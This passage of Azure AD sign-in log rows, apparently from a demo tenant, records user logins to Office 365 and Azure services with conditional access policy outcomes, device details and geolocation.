+2123,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,17:35.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,271b1bb3-28da-4de2-a25c-a413aea8f5bd,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office 365 Exchange Online,00000002-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 15:17,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",669c457e-4441-4eab-88a8-07b7a1011200,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 Exchange Online,669c457e-4441-4eab-88a8-07b7a1011200,SigninLogs,Sucess,33.7984581,-84.38828278
+2124,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,17:38.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,9c3abbd0-2030-4a0f-876d-90320a3c316b,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 15:17,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",09a9b111-0bef-49d6-ac1b-dbcdbded1200,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office365 Shell WCSS-Server,09a9b111-0bef-49d6-ac1b-dbcdbded1200,SigninLogs,Sucess,33.7984581,-84.38828278
+2125,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,20:54.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,e1c8469f-5022-0000-54b3-3fbeb009e660,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Office 365 SharePoint Online,00000003-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 15:20,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",e555e9d8-8e19-4918-91cf-fdbc7e721200,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,e555e9d8-8e19-4918-91cf-fdbc7e721200,SigninLogs,Sucess,41.90428925,-85.99833679
+2126,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,22:21.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,b500a884-ff38-4cbe-aa8c-090eacd13fc3,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 15:22,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",c95450b3-582d-4306-9dd2-9bda12bf1200,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office365 Shell WCSS-Server,c95450b3-582d-4306-9dd2-9bda12bf1200,SigninLogs,Sucess,41.90428925,-85.99833679
+2127,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,24:26.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,74fd553a-d44a-449a-92b0-084a2356a474,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,BE,Microsoft Office Web Apps Service,67e3df25-268a-4324-a550-0de1c7f97287,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}]",notApplied,08/04/2020 15:24,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",fd7a6355-56f5-4bc2-9ad4-c25906671000,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,fd7a6355-56f5-4bc2-9ad4-c25906671000,SigninLogs,Sucess,50.6406517,5.572050095
+2128,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,23:18.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,9537efd8-b070-4167-beaa-489157b86584,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office Online Client AAD- Augmentation Loop,2abdc806-e091-4495-9b10-b04d93c3f040,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 15:23,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",23bcff85-732c-47fa-be9f-91d3ff6e1200,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Augmentation Loop,23bcff85-732c-47fa-be9f-91d3ff6e1200,SigninLogs,Sucess,33.7984581,-84.38828278
+2129,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,22:18.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,f5ca49d8-69e0-46c5-a3b4-a6795f6ed2a3,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Office 365 Exchange Online,00000002-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 15:22,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",c95450b3-582d-4306-9dd2-9bda9fbe1200,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 Exchange Online,c95450b3-582d-4306-9dd2-9bda9fbe1200,SigninLogs,Sucess,41.90428925,-85.99833679
+2130,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,13:47.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,a1165b22-be1d-4e78-8b8a-73a0d8bbff2b,Microsoft.aadiam,Microsoft.aadiam,,Ashish Kapila,4,GB,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 15:13,"{'operatingSystem': 'Windows 10', 'deviceId': 'a8835158-f705-4014-a58f-5a04beb76aba', 'browser': 'Edge 80.0.361', 'displayName': 'MININT-15OQVR5', 'trustType': 'Hybrid Azure AD joined', 'isCompliant': True, 'isManaged': True}",273e63f4-458f-4455-8ca9-7b100b002e00,,,"{'countryOrRegion': 'GB', 'geoCoordinates': {'longitude': -0.9697200059890749, 'latitude': 51.445831298828125}, 'state': 'Reading', 'city': 'Reading'}",none,none,none,none,[],{'errorCode': 0},Ashish Kapila,61c20c19-6e81-4684-affc-fdb7086bb546,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,273e63f4-458f-4455-8ca9-7b100b002e00,SigninLogs,Sucess,51.4458313,-0.969720006
+2131,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,16:33.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,d35a04a6-36b3-4e15-8e78-455c3af1dad9,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Microsoft App Access Panel,0000000c-0000-0000-c000-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 